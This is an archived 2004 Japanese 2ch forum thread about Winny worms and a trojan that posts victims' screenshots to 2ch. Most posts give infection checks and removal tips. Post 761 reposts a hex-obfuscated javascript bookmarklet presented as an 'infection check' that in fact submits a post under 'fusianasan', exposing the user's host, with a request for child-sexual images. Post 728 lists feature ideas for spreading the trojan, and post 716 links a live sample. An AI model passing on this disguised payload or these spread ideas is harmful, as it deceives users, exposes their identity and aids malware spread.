【警報】Winnyを狙ったワーム・ウイルス情報 Part26

[表示 : 全て最新50 1-99 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 2chのread.cgiへ]
Update time : 07/06 07:03 / Filesize : 237 KB / Number-of Response : 1002
[このスレッドの書き込みを削除する]
[＋板最近立ったスレ＆熱いスレ一覧 : ＋板最近立ったスレ／記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

1 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/11 12:10:15 ID:j8DDPfNG]: Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。
なお、ここは初心者の質問スレではありません。

■流行種
・元祖Antinny系　・キンタマ系　・batファイル　・スクリーンセーバー　etc

■流行感染パターン
・exeの前にスペースたくさん（例：「秘密の写真.jpg　　　　　　　　　.exe」等）
・拡張子が.folderに変更されたHTMLからexeを実行させる
・autorunからbatファイルを実行させる
・スタートアップに解凍させ、再起動後exeを実行させる

■DL後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルはうかつに実行しない
・ファイルのアイコンが偽装されてないか確認する

■全ての感染者に共通の、絶対確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、待避するなり諦めるなりしてください。

前スレ
【警報】Winnyを狙ったワーム・ウイルス情報 Part25
tmp4.2ch.net/test/read.cgi/download/1093270545/l50

ﾃﾝﾌﾟﾚまとめ　www.geocities.jp/kemkzuenc/Antinny.html
Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/
685 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:05:08 ID:IFT2b9V5]: >>682
タスクマネージャひらいてプロセス見て、
なかにshellsystem.exeってのがあったらアウト。
686 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:12:36 ID:LvJ+JBBu]: >>682
つーか、exe実行したの？実行してないなら９割９分平気。
687 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:19:35 ID:EETLBaqB]: >>685
アリガトウ。感染してないみたいだ。良かった

>>686
してないと思う。
688 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:29:09 ID:xduUn+v/]: 作りこんではあるが、洗練されてない
不必要なコードがいっぱいあるけど、なんでやろ。

ttp://www.ff.iij4u.or.jp/~ch2/bbstable.html
ここからターゲット（おすすめ、チャット、特別企画、ツール類、運営案内など）を選択、

FROM=%s&mail=%s&MESSAGE=%s&bbs=%s&key=%s&time=%s&submit=%sで、メル欄に回数
subject=%s&FROM=%s&mail=%s&MESSAGE=%s&bbs=%s&time=%s&submit=%s、スレ作成機能
form-data /upload/c=03okari/confirm.cgi
up.isp.2ch.net up.isp.2ch.net/upload/c=03okari/confirm.cgi この辺で取得して書きコ
Software\Meropa ？？なんだろこのディレクトリ
Software\Microsoft\Windows\CurrentVersion\Run 投下先
Software\Microsoft\Microsotf 何か投下
フォルダアイコンはbitmapをそのまま使ってるから変なんだな

逆アセも簡単そうなので、環境持ってると............
パラメータを変えるだけで、感染能力含め、かなりいろいろなことができるように作ってある
いわば、キンタマメイカーのようなものか？
689 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:30:41 ID:yEjCkAsP]: カキコの内容少し弄るだけで又２ｃｈに投稿されるようになるしな
690 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:33:43 ID:62NRg8JO]: 将来のために余裕を持って設計してあるってことか…
691 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:35:48 ID:MBxbzncs]: まだまだ祭りは続きそうだ
692 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:39:42 ID:9fWyBJ/z]: 今日はネットをしていなかった
今更ながらウィルスの存在を知った。
さっそく調べて行って見た。
関さんが面白いと思った。
693 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:39:47 ID:qx0T+sDR]: ｷﾝﾀﾏ騒ぎがあってよかーたと重田
694 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:09:24 ID:LvJ+JBBu]: >>690
いくらでも亜種が作れるってことだろうな
695 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:12:23 ID:rtwkFYAH]: >>685
タスクマネージャのプロセスから削除だけじゃダメなの？
696 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:19:45 ID:kOQgldzO]: 当たり前だろ…
697 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:21:34 ID:rtwkFYAH]: やっぱりだめか
698 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:23:04 ID:qaAkrrtW]: 再起動したら復活するし
699 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:25:47 ID:Y5vbHsBs]: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
ここら辺もregeditで見とけよ
700 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:27:59 ID:rtwkFYAH]: shellsystem.exe以外は無視してOK？
あとノートンで遮断した場合は画像は流れない？
701 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:34:09 ID:XZhKNgqY]: なんだか調子に乗って改造した奴が先に逮捕されそう
702 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:37:36 ID:rMURrwFg]: 牛に我慢させるか
703 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:40:22 ID:EiFN9IZi]: 誤爆だ　わりぃ
704 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:44:18 ID:62NRg8JO]: これならとってもわかりやすい画像ですな

v.isp.2ch.net/up/6e671bb4b867.jpg　もう典型的かと
705 名前：[名無し]さん(bin+cue).rar [04/09/23 04:58:57 ID:MZi2DiBQ]: これｘｐ以外は平気なの？
706 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:59:21 ID:SFKAhjW3]: ノートンインターネットセキュリティの様なものが常駐してたら
プログラムによって勝手に晒されるようなことは無いよな？
707 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:00:55 ID:JtMoVLJN]: plaza.rakuten.co.jp/sakinya/
708 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:02:56 ID:g70Ywgh6]: >>705
どうしてそういう結論になるのかが判らん。

>>706
設定次第。学習モードとかでユーザが勝手な通信を許可したら､
なんぼセキュリティソフトが入っててもそりゃアウトにもなる。
709 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:04:36 ID:Q7dG25BA]: アップローダから知らないファイル落としたりしなきゃ、感染しないんだよな？
こうもいっぱいかかってると、最近何も落としてないのに不安になる
710 名前：[名無し]さん(bin+cue).rar [04/09/23 05:04:47 ID:MZi2DiBQ]: >>708
ボロPCで感染実験してみたのさ（OS　ME）
そんで晒されるか待ってるだけど、一向にうｐされないんでつよ。
711 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:05:29 ID:4TL6YJ26]: まぁ拡張子表示はしっかりしとけってこったな
712 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:09:58 ID:xduUn+v/]: >>705
苺キンタマ(仮)は、Windows 98以降なら感染というか、踏んだら効果を示す

>>706
httpを使うからWebが見られる環境ならアウト（f/wで80番閉じてれば別だが、web見られないよ）
713 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:10:25 ID:5x3EooTF]: v.isp.2ch.net/up/4250ab8226aa.jpg
貴様ッ見ているな！
714 名前：[名無し]さん(bin+cue).rar [04/09/23 05:13:40 ID:MZi2DiBQ]: windows\shellsystem.exeはあったんだけど
レジストリは追加されてないんだよね
これじゃまだ感染しとらんのかね？

もう一回踏んでみるかな。。。
715 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:14:27 ID:57yhE0eV]: PFW入れてれば、ウィルスが通信しようとしたのを検知してくれるんじゃないかい
何でもOKで通してれば意味無いけど
あと、SP2のPFWはアウトバウンド検知してくれないんだっけ？
716 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:18:37 ID:aY8YkHOS]: ttp://strawberry.web-sv.com/cgi/up/ia/up1360.zip
トロイらしいんだけど、だれか解析頼む。
717 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:19:45 ID:xduUn+v/]: >>715
ウイルスというか、現時点ではトロイなんだが
通信といっても、書き込みと変わらんからf/wでの検知は難しい
XP SP2のf/wは、外→内のみ。
718 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:25:36 ID:JsiucGEH]: 結局はキンタマと同じでexeを実行しなければいいってことだけど
XPは標準で表示しないしな。
何でこんな仕様なんだorz

ところでアップローダスレを自分のユーザ名で検索してしまった香具師

ﾉｼ
719 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:25:48 ID:eq0QK75x]: 俺もサンプルとして捕獲しておきたいんだが、苺1の1360の三点セットってやつでいいんだよね。
720 名前：[名無し]さん(bin+cue).rar [04/09/23 05:27:02 ID:Ypzo5dny]: ってかny関係ないじゃん・・・
721 名前：[名無し]さん(bin+cue).rar [04/09/23 05:28:00 ID:0ylh05j4]: ｽﾚﾀｲでややこしくなってるね
722 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:28:17 ID:57yhE0eV]: >>717
普通のPFWってEXEファイル単位で通信を検知して知らせてくれんじゃないの？
ループバックでも利用してない限りは大丈夫だと思うが
723 名前：719 mailto:sage [04/09/23 05:29:12 ID:eq0QK75x]: ＯＫ、これであってたようだ。
724 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:29:54 ID:MqBRPt/h]: >httpを使うからWebが見られる環境ならアウト（f/wで80番閉じてれば別だが、web見られないよ）

>f/w
725 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:33:52 ID:Pi3bt/OK]: おもしろそいので俺も捕獲しとこ
726 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:34:21 ID:AH6SroMo]: さて、キンタマと違って
特定のサイトやアップローダーに書き込みを行う以上
そこから業務妨害で損害賠償請求されてもおかしくないトロイなんだが

ま、日本の警察じゃ作成者を特定できんだろうな・・・
でも、苺にexeファイルをアップした人間を特定して締め上げればいいのか？
727 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:34:22 ID:Pi3bt/OK]: 間違え;y=ｰ( ﾟдﾟ)･∵.　ﾀｰﾝ
728 名前：[名無し]さん(bin+cue).rar [04/09/23 05:50:14 ID:U98tvZkV]: 要望まとめ
・複数のうpろだをランダムに使うように(2ちゃんねるアップローダーはやめれ)
・デスクトップ画像以外もうｐするように(kakikomi.txtとか)
・繁殖機能。zipで適当なファイルといっしょにウィルス本体も固めてうｐ。
・Rock54対策。NGワードが含まれる書き込みが規制されるから晒しテンプレを複数作れば大丈夫か?
729 名前：[名無し]さん(bin+cue).rar [04/09/23 05:50:39 ID:VGKgqq6T]: なんで怪しいexeファイルを実行すんのかなって思ってたけど
拡張子を表示しない設定だと初心者はわからんわな～
730 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:52:17 ID:IFT2b9V5]: >>728
要望するなよ(笑)
731 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:52:23 ID:4TL6YJ26]: セキュリティに対する意識ってなかなかあがらないな
732 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:54:24 ID:fgnK5pHv]: >>728
共犯者ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!!
733 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:56:44 ID:tcoLxpqV]: 人間のロリ好きってアニメ、ゲームも好む傾向があるんだな。
なかなか興味深かった。
734 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:58:31 ID:cTDJ+/Lv]: kakikomi晒されたら辛いな
他の情報で個人割れてたらきっと死人が出る
735 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:07:00 ID:JsiucGEH]: exeごとに通信制御するNortonとかのFWは
ポート80番使ってようとブロックするんじゃないの？
736 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:09:13 ID:IFT2b9V5]: >>735
する。というか、初物がソケットひらこうとしたときに騒ぐ。
737 名前：[名無し]さん(bin+cue).rar [04/09/23 06:10:23 ID:0ylh05j4]: で、エロの魔力で許可するをクリック！
738 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:18:26 ID:0jfdhz8j]: 簡易プロテクト？

C:\WINDOWS>copy notepad.exe shellsystem.exe
C:\WINDOWS>attrib +R shellsystem.exe

とりあえず実験用の９８ＳＥ環境ではうまくいった。
メインマシンで実験する度胸はないので、ＸＰなどでは不明。
739 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:25:02 ID:J6w/KxT0]: これ犯人たどれるだろ。ネットカフェとかかな？
740 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:26:03 ID:IFT2b9V5]: >>739
踏み台はさまってたら無理
741 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:29:08 ID:J6w/KxT0]: >>740
プロバイダに問い合わせりゃアクセス記録のこってんじゃないの？
742 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:32:12 ID:IFT2b9V5]: >>741
ドコのプロバイダに問い合わせるの？
743 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:32:29 ID:JsiucGEH]: 海外プロキシを多段でかましてればよほどのことがないと
たどれてもたどらないと思う。
744 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:35:42 ID:J6w/KxT0]: >>742
踏み台のだよ。
745 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:38:02 ID:IFT2b9V5]: >>744
もし俺が犯人だったとしたら、踏み台にしろ串にしろ
一段ではやらないだろうね。捕まりたくないし。
746 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:40:16 ID:xduUn+v/]: >>739
追求のキーになるのが >>688で報告した
> Software\Meropa ？？なんだろこのディレクトリ
なんだが、こんなディレクトリを作るアプリは、かなーり特殊な
半導体設計用のものらしい。こんなの入れてる人間は国内では限られる。
ここから手繰るのがよさげ。スキルは相当と思えるので、配布元から掘るのは難しそう
747 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:40:33 ID:J6w/KxT0]: >>745
俺がもし被害者だったら100段くらいまでは頑張ってたどるよｗ
この手のウイルスは犯人が殺されても不思議じゃないと思うんだが。
748 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:44:13 ID:xduUn+v/]: >>747
そこいらに、いくらでもある
WEP無効の無線LANを踏み台にしてたら、
多段串・海外串なんか使わなくても
たどるのは難しい。
749 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:44:40 ID:J6w/KxT0]: 殺されるは言い過ぎかｗ　でもなんらかの報復は受けると思う。
つーか踏み台に時限セットされたものなら辿るの不可能っぽいな・・
750 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:45:30 ID:zW53Q5jb]: ネカフェで時限式アップロードするように仕込んだとか。
751 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:46:34 ID:99Ier2R9]: 頑張れ。
752 名前：[名無し]さん(bin+cue).rar [04/09/23 07:02:00 ID:CBy0Cio6]: こうゆうのを見ると2chやnyする人ってヒッ●ーだけなのかなって思うね

v.isp.2ch.net/up/fa86350a6026.jpg

ウイルスに気づかずに必死に抜いている人1名ｗ
753 名前：469 mailto:sage [04/09/23 07:04:35 ID:kh8TR4yq]: これって本人達が寝てる間は安全なんだね。
754 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:08:11 ID:kh8TR4yq]: 数字消すの忘れた・・・＿|￣|○
755 名前：[名無し]さん(bin+cue).rar [04/09/23 07:08:12 ID:CBy0Cio6]: どうせなら、SS、PC名だけじゃなくて、
IP・ホストも晒してほしかったな
756 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:12:12 ID:IFT2b9V5]: >>752
これは狙ってやってる気がしないではないな(笑)
757 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:45:55 ID:CtAJ3p7u]: 俺はこんなウイルスは怖くて作れないな
何が怖いって狙われるのが怖いね
作った奴は絶対に捕まらないと思ってるんだから
本気になって追ってみたら面白いことになるかも
例えばウイルス作者が警察だったりしたらヤバイだろうし。
そうじゃなくても作った奴は確実に追われた後人生終わるだろうし
そんな一世一代の大事俺は出来ない
758 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:14:59 ID:wZ9Gu9IX]: 新種ウイルスと聞いてきました
759 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:15:35 ID:iqYKdWhe]: 面白い事考える奴もいるもんだな
760 名前：[名無し]さん(bin+cue).rar [04/09/23 08:18:41 ID:U98tvZkV]: Winnyは関係ないけどな。
今やってるのはShareで回ってるふしあなで2ch書き込みと半虹の苺ｷﾝﾀﾏ
761 名前：[名無し]さん(bin+cue).rar [04/09/23 08:25:55 ID:U98tvZkV]: 便乗してこれまで流行ってる
JavaScript:document.body.innerHTMLのｶﾞｲﾄﾞﾗｲﾝ2
that3.2ch.net/test/read.cgi/gline/1076853643/595-586

感染確認するには
2ch専用ブラウザを使用している人は、ＩＥなどの一般的なブラウザでこのスレを開いておく。
１、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b
46524f4d2e76616c75653d2766757369616e6173616e273b4d455353414
7452e76616c75653d275c75333045445c75333045415c75373533425c75
353043465c75333034465c75333036305c75333035355c7533303434273
b7375626d69742e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+=
'%'+s.substr(l,2);eval(unescape(e));
をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。

２、改行を外して１行にする。
３、１行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。
４、 Enterを押す（もしくは「移動」をクリックする）。
エラーが出れば感染してます
762 名前：[名無し]さん(bin+cue).rar [04/09/23 08:26:46 ID:U98tvZkV]: >>761
参照間違えた・・
that3.2ch.net/test/read.cgi/gline/1076853643/595-596
763 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:27:19 ID:1gUyhrM3]: 　
764 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:51:04 ID:SPCjNc3y]: 俺はﾍﾟｹﾋﾟｰがはじめての初心者だが、拡張子表示は真っ先にやったぞ…。
まぁ、かつては黒羊とﾒｰﾙｽﾄｰﾑをふんだ苦い経験持ちだが。
765 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:07:42 ID:SY1J+4JW]: >>761
ﾜﾛﾀ
ロリ画像ですか
766 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:08:11 ID:GmtpX3PS]: 【使用OS】WinXP
【WindowsUpdateしてるか】はい。
【AntiVirusは】？？
【ちゃんとUpdateしてるか】？？
【スキャンした結果】オンラインにてスキャン
【オンラインスキャンしたならその結果は】いつもなら数個出るのに、不自然なぐらい何も検出されませんでした。
【Winnyのﾊﾞｰｼﾞｮﾝ】使ってません。ネットでウィルス貰いました。
【Winny歴、総DL量は】無し
【テンプレを読んだか】はい。
【テンプレにある対策を実行したか】実行しました。特に何も無かったです。
【症状か具体的に、分かる限りすべて書く】何となく、重い。動作が鈍い。
【何をしたらそんなことになったのか】うｐされてたファイルを開いたら。
【これまでにとった措置】オンラインスキャンのみ。
767 名前：[名無し]さん(bin+cue).rar [04/09/23 09:12:14 ID:U98tvZkV]: >>766
(写真集) (ロリータ) 水原友里.exe
(写真集) (ロリータ) 相田香奈子.exe
コピー～ (写真集) (ロリータ) 河瀬菜美.exe
どれか開いた?
768 名前：[名無し]さん(bin+cue).rar [04/09/23 09:19:52 ID:Jz5Ghtix]: キンタマ作った香具師、逮捕されたのか
769 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:25:30 ID:GmtpX3PS]: >>767
開いたというか、ダブルクリックして開こうとした。
どれだったか覚えてない…。多分、２回ぐらい開こうとした。
何か怪しかったし、急にPCの反応がおかしくなったから、速攻電源切りました。
その後にまた起動して、全部ゴミ箱に捨てて、ゴミ箱も空にしました。
770 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:28:46 ID:kh8TR4yq]: >>769
もう遅いｗ
とりあえず↓に来い。
削除の方法が分かるかもしれない。

アップローダーってずるい
idol.bbspink.com/test/read.cgi/ascii2d/1095880065/
771 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:28:49 ID:j/Jnnczc]: >>769
今すぐネットを切断
C:\WINDOWSフォルダの中でshellsystem.exeを消せ
再起動して後は知ってるならレジストリの自動実行の辺りを探せ
急げ
772 名前：[名無し]さん(bin+cue).rar [04/09/23 09:29:12 ID:U98tvZkV]: >>769
とりあえずユーザ名とコンピュータ名を晒せ。
マイコンピュータのプロパティから見れる。
773 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:30:19 ID:afWjuRcq]: >>766
ご愁傷様
774 名前：[名無し]さん(bin+cue).rar [04/09/23 09:30:56 ID:0ylh05j4]: >>685
を見て確認してみ
775 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:41:27 ID:P9SKfCRL]: >>762
596 名前：水先案名無い人[sage] 投稿日：04/09/21(火) 22:21:33 ID:aLtl7+rE<
>>595のやつやると名前欄fusianasan、本文ロリ画像くださいで勝手に投稿されるってわけか？

597 名前：水先案名無い人[] 投稿日：04/09/21(火) 23:16:48 ID:raTTdWET<
16進でご苦労な事だ。

598 名前：p29d3b8.urawac00.ap.so-net.ne.jp[] 投稿日：04/09/21(火) 23:18:09 ID:ItaWKNCP<
ロリ画像ください

599 名前：水先案名無い人[sage] 投稿日：04/09/21(火) 23:18:27 ID:ItaWKNCP<
orz

600 名前：水先案名無い人[sage] 投稿日：04/09/22(水) 00:18:50 ID:8s+8uxdE<
おらは投稿確認が出て助かっただ

601 名前：水先案名無い人[sage] 投稿日：04/09/22(水) 01:00:01 ID:A3RcQubp<
そいえば、たいていの掲示板ってhttpだからポストする時に
暗号化されていないデータが云々のダイアログを出せるはずだが、
それを解除してる人って結構多いみたいだね。

602 名前：zaq3d2e96f7.zaq.ne.jp[] 投稿日：04/09/22(水) 02:42:09 ID:nVW0EyTb<
ロリ画像ください

603 名前：濡れ衣 zaq3d2e96f7.zaq.ne.jp ◆SbICHIROZ6 [sage] 投稿日：04/09/22(水) 02:43:59 ID:nVW0EyTb<
570はどうなるかちゃんと書いておいてくれよ。。
リモホ晒すのは構わないけど、テストスレになっちまうぞ

604 名前：水先案名無い人[sage] 投稿日：04/09/22(水) 03:55:11 ID:7PnzxniJ<
いかん、笑いが止まらんｗ
やらんでよかったｗ
776 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:47:30 ID:tcoLxpqV]: ノートンでスキャン中の画像がよく晒されてたけど
対策ソフト入れてると安心するから簡単に引っかかるんじゃないの。
しかもこういう祭り時には無力。全くの無駄金だな。
777 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:53:59 ID:qlyssBj7]: 拡張子表示は鬱陶しいし、長いスペースとかがあるから詳細表示のファイルの種類で判断してるなぁ
778 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:55:34 ID:GmtpX3PS]: >>771
そのレジストリとやらは良く分からんが…
まあ、とりあえず初心者板で聞いてくる。
検索したらshellsystem.exeが見付かった。
とりあえず、急ぎます。ありがとう。
779 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:57:12 ID:cDvdfQLH]: >拡張子表示は鬱陶しい

ﾊｧ?
780 名前：[名無し]さん(bin+cue).rar [04/09/23 10:00:05 ID:/EYVc77v]: 明かされてる画像みても無害？
781 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:01:16 ID:xduUn+v/]: いくらノートン先生でも、登場したてのトロイにすぐには反応できませんぜ
今回の作成日時は、3本とも22日15:57 流されたのが夕方としても、まだ
10時間しかたってない。しかも踏んでるやつ大杉。

作者も、これほどの効果を期待してなかっただろーな。そうでなきゃアプロダ
が落ちるというのも考慮してると思う。この反応からして、ここ数日間に数種の
亜種が出てくると思う。トロイの改変も楽勝っぽいので、便乗犯も多そう。

一番のセキュリティホールは、ユーザーの意識だもんよ。
782 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:03:05 ID:Ze0M08FR]: ちなみにキンタマが発見されたのが3月半ば。対応は3月末。
783 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:03:32 ID:kDRZUavo]: 歴史は繰り返す。
784 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:05:29 ID:4TL6YJ26]: そして人は学ばない
785 名前：[名無し]さん(bin+cue).rar [04/09/23 10:07:05 ID:7loVoFeI]: mp3の名前などを勝手にいじるウィルスってあります？

[ 続きを読む ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef